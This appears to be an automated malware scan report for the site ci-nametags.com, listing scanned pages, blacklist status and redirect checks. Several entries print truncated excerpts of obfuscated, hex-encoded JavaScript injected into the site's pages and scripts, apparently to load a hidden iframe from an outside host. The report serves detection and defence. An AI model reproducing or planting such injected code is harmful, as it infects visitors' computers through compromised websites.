Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ci-nametags.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.ci-nametags.com/ | 200 OK Content-Length: 33776 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) bzlssp="s"+"p"+"li"+"t";miiyy=window;wlvzj="dy";guem=document;caezvk="0x";vfsiq=(5-3-1);try{++(guem.body)}catch(ymw){tohi=false;try{}catch(sezu){tohi=21;}if(1){epkyu="17:5d:6c:65:5a:6b:60:66:65:17:70:5a:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:70:5a:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20: Antivirus reports:
| ||
http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js | 200 OK Content-Length: 57254 Content-Type: text/javascript | clean |
http://ci-nametags.com/_include/js/ajaxticker.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 04 Mar 2015 12:58:14 GMT Location: http://www.ci-nametags.com/_include/js/ajaxticker.js Server: Apache Content-Length: 325 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.ci-nametags.com/_include/js/ajaxticker.js | 200 OK Content-Length: 16138 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ps="split";e=eval;v="0x";a=0;z="y";try{a*=25}catch(zz){a=1}if(!a){try{--e("doc"+"ument")["\x62od"+z]}catch(q){a2="_";sa=0xa-02;}z="28_6e_7d_76_6b_7c_71_77_76_28_82_82_82_6e_6e_6e_30_31_28_83_15_12_28_7e_69_7a_28_75_78_78_6a_69_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_7a_6d_69_7c_6d_4d_74_6d_75_6d_76_7c_30_2f_71_6e_7a_69_75_6d_2f_31_43_15_12_15_12_28_75_78_78_6a_69_36_7b_7a_6b_28_45_28_2f_70_7c_7c_78_42_37_37_7b_78_6d_76_6c_75_6d_7c_6d_7b_7c_36_6b_77_75_37_5b_6d_7a_7e_71_6b_6d_7b_37_6b_77_7d_76_7c_ Antivirus reports:
| ||
http://www.statcounter.com/counter/counter.js | 200 OK Content-Length: 21363 Content-Type: application/x-javascript | clean |
http://www.ci-nametags.com/test404page.js | HTTP/1.1 302 Found Connection: close Date: Wed, 04 Mar 2015 12:58:17 GMT Location: http://www.ci-nametags.com/404.php Server: Apache Content-Length: 287 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.ci-nametags.com/404.php | 200 OK Content-Length: 27497 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) xiiff="s"+"p"+"li"+"t";xoncms=window;shkm="dy";cnxi=document;lqyj="0x";txs=(5-3-1);try{++(cnxi.body)}catch(rlsjr){nwtmhq=false;try{}catch(uzdk){nwtmhq=21;}if(1){ddn="17:5d:6c:65:5a:6b:60:66:65:17:60:69:5f:5a:6f:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:60:69:5f:5a:6f:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:6 Antivirus reports:
| ||
http://www.ci-nametags.com/_include/js/jquery.cross-slide.js | 200 OK Content-Length: 22866 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ps="split";e=eval;v="0x";a=0;z="y";try{a*=25}catch(zz){a=1}if(!a){try{--e("doc"+"ument")["\x62od"+z]}catch(q){a2="_";sa=0xa-02;}z="28_6e_7d_76_6b_7c_71_77_76_28_82_82_82_6e_6e_6e_30_31_28_83_15_12_28_7e_69_7a_28_75_78_78_6a_69_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_7a_6d_69_7c_6d_4d_74_6d_75_6d_76_7c_30_2f_71_6e_7a_69_75_6d_2f_31_43_15_12_15_12_28_75_78_78_6a_69_36_7b_7a_6b_28_45_28_2f_70_7c_7c_78_42_37_37_7b_78_6d_76_6c_75_6d_7c_6d_7b_7c_36_6b_77_75_37_5b_6d_7a_7e_71_6b_6d_7b_37_6b_77_7d_76_7c_ Antivirus reports:
| ||
http://www.ci-nametags.com/_include/js/jquery.cross-slide.min.js | 200 OK Content-Length: 16042 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ps="split";e=eval;v="0x";a=0;z="y";try{a*=25}catch(zz){a=1}if(!a){try{--e("doc"+"ument")["\x62od"+z]}catch(q){a2="_";sa=0xa-02;}z="28_6e_7d_76_6b_7c_71_77_76_28_82_82_82_6e_6e_6e_30_31_28_83_15_12_28_7e_69_7a_28_75_78_78_6a_69_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_7a_6d_69_7c_6d_4d_74_6d_75_6d_76_7c_30_2f_71_6e_7a_69_75_6d_2f_31_43_15_12_15_12_28_75_78_78_6a_69_36_7b_7a_6b_28_45_28_2f_70_7c_7c_78_42_37_37_7b_78_6d_76_6c_75_6d_7c_6d_7b_7c_36_6b_77_75_37_5b_6d_7a_7e_71_6b_6d_7b_37_6b_77_7d_76_7c_ Antivirus reports:
| ||
http://www.ci-nametags.com/shop-by/logonologo.php | HTTP/1.1 302 Found Connection: close Date: Wed, 04 Mar 2015 12:58:19 GMT Location: http://www.ci-nametags.com/404.php Server: Apache Content-Length: 287 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.ci-nametags.com/shop-by/style.php | HTTP/1.1 302 Found Connection: close Date: Wed, 04 Mar 2015 12:58:20 GMT Location: http://www.ci-nametags.com/404.php Server: Apache Content-Length: 287 Content-Type: text/html; charset=iso-8859-1 | clean |
https://www.ci-nametags.com/secure/mcart/mof.cgi?viewcart | HTTP/1.1 302 Found Connection: close Date: Wed, 04 Mar 2015 12:58:21 GMT Location: https://www.ci-nametags.com/secure/mof15/nocookies.html Server: Apache Content-Length: 309 Content-Type: text/html; charset=iso-8859-1 | clean |
https://www.ci-nametags.com/secure/mof15/nocookies.html | 200 OK Content-Length: 9466 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) xiiff="s"+"p"+"li"+"t";xoncms=window;shkm="dy";cnxi=document;lqyj="0x";txs=(5-3-1);try{++(cnxi.body)}catch(rlsjr){nwtmhq=false;try{}catch(uzdk){nwtmhq=21;}if(1){ddn="17:5d:6c:65:5a:6b:60:66:65:17:60:69:5f:5a:6f:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:60:69:5f:5a:6f:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:6 Antivirus reports:
| ||
http://www.ci-nametags.com/blog | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 04 Mar 2015 12:58:23 GMT Location: http://www.ci-nametags.com/blog/ Server: Apache Content-Length: 309 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.ci-nametags.com/blog/ | 200 OK Content-Length: 24641 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) bzlssp=\"s\"+\"p\"+\"li\"+\"t\";miiyy=window;wlvzj=\"dy\";guem=document;caezvk=\"0x\";vfsiq=(5-3-1);try{++(guem.body)}catch(ymw){tohi=false;try{}catch(sezu){tohi=21;}if(1){epkyu=\"17:5d:6c:65:5a:6b:60:66:65:17:70:5a:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:70:5a:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58 Antivirus reports:
| ||
http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js?ver=3.5.1 | 200 OK Content-Length: 78601 Content-Type: text/javascript | clean |
http://www.ci-nametags.com/blog/wp-content/themes/business-turnkey/assets/js/functions.js?ver=3.5.1 | 200 OK Content-Length: 584 Content-Type: text/javascript | clean |
http://www.ci-nametags.com/blog/wp-content/themes/business-turnkey/assets/js/cycle.min.js?ver=3.5.1 | 200 OK Content-Length: 31032 Content-Type: text/javascript | clean |
http://www.ci-nametags.com/blog/wp-content/themes/business-turnkey/assets/js/lightbox_me.js?ver=3.5.1 | 200 OK Content-Length: 4014 Content-Type: text/javascript | clean |
http://www.ci-nametags.com/blog/wp-content/plugins/sociable/js/sociable.js?ver=3.5.1 | 200 OK Content-Length: 1959 Content-Type: text/javascript | clean |
http://www.ci-nametags.com/blog/wp-content/plugins/sociable/js/addtofavorites.js?ver=3.5.1 | 200 OK Content-Length: 602 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ci-nametags.com
Result:
GET / HTTP/1.1
Host: ci-nametags.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: ci-nametags.com
Referer: http://www.google.com/search?q=ci-nametags.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: ci-nametags.com
Referer: http://www.google.com/search?q=ci-nametags.com
Result:
The result is similar to the first query. There are no suspicious redirects found.